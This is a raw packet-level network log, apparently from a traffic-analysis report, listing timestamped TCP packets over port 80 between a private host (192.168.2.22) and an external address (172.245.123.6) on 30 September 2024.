                                                                                  Sep 30, 2024 10:12:22.901623964 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901635885 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901645899 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901658058 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901865005 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901879072 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901884079 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.901884079 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.901892900 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901921034 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901932001 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901942015 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697165012 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697376013 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697386980 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697397947 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697428942 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697438002 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697454929 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697464943 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697480917 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697489023 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697490931 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697501898 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697503090 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697511911 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697520018 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697526932 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697537899 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697546959 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697562933 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697973967 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697984934 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697994947 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698034048 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698040009 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698045015 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698055983 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698061943 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698066950 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698075056 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698086977 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698102951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698153973 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698163986 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698179007 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698190928 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698199987 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698199987 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698210955 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698211908 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698224068 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698225021 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698232889 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698237896 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698254108 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698265076 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698847055 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698857069 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698867083 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698878050 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698888063 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698894024 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698899031 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698906898 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698919058 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698928118 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698962927 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698973894 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698983908 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698993921 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699003935 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699001074 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699013948 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699016094 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699023962 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699038029 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699044943 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699054956 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699055910 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699064970 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699085951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699103117 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699784994 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699799061 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699815035 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699825048 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699829102 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699836016 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699837923 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699846983 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.699855089 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699867010 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.699878931 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.701884031 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.701930046 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.701942921 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.701976061 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702327013 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702373028 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702505112 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702527046 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702538013 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702547073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702553988 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702558041 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702563047 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702568054 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702578068 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702579975 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702588081 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702596903 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702596903 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702604055 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702608109 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702619076 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702621937 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702630997 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702634096 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702645063 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702651024 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702651024 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702656031 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.702672958 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.702687025 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.703073025 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.703119040 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.703119993 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.703130960 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.703157902 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.703159094 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.703169107 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.703177929 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.703197002 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.703207970 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.787908077 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.787985086 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.788001060 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.788017988 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.788028002 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.788036108 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.788036108 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.788036108 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.788039923 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.788044930 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.788052082 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.788058043 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.788062096 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.788111925 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789119005 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789160013 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789170980 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789186954 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789186954 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789220095 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789222002 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789232016 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789242029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789247990 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789258957 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789275885 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789275885 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789294958 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789324045 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789334059 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789345026 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789355040 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789365053 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789376974 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789392948 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789392948 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789416075 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789416075 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789426088 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789436102 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789446115 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789455891 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789467096 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789483070 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789485931 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789485931 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789494991 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789505005 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789515018 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789515018 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789515972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789527893 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789539099 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789561033 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789561033 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789582968 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.789652109 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789663076 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789671898 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789681911 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.789691925 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880444050 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880449057 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880459070 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880460024 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880475044 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880492926 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880558014 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880568981 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880579948 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880590916 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880600929 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880604029 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880611897 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880625963 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880629063 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880629063 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880644083 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880659103 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880676985 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880686998 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880697012 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880707026 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.880716085 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880748034 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880748034 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.880784035 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884437084 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884495974 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884515047 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884526968 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884548903 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884550095 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884558916 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884563923 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884569883 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884577036 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884581089 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884589911 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884592056 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884602070 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884603024 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884613037 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884619951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884624004 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884633064 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884646893 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884663105 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884790897 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884834051 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884840012 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884845972 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.884865046 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.884882927 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885025978 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885042906 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885052919 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885062933 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885072947 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885072947 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885083914 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885086060 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885094881 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885101080 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885104895 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885114908 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885116100 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885126114 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885129929 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885137081 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.885147095 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885160923 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885174036 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.885198116 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970402002 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970417023 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970427036 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970438957 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970454931 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970465899 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970488071 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970499039 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970504045 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970509052 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970527887 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970534086 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970539093 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970544100 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970560074 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970570087 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970582008 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970587015 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970592022 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970596075 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970596075 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970597029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970602036 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970612049 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970617056 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970629930 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970639944 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970644951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970644951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970645905 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970654964 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970664978 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970665932 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970670938 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970688105 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970700026 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970700026 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970705986 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970710039 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970722914 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970722914 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970735073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970736980 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970748901 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970757961 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970760107 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970766068 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970773935 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.970782042 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.970783949 CEST8049167172.245.123.6192.168.2.22
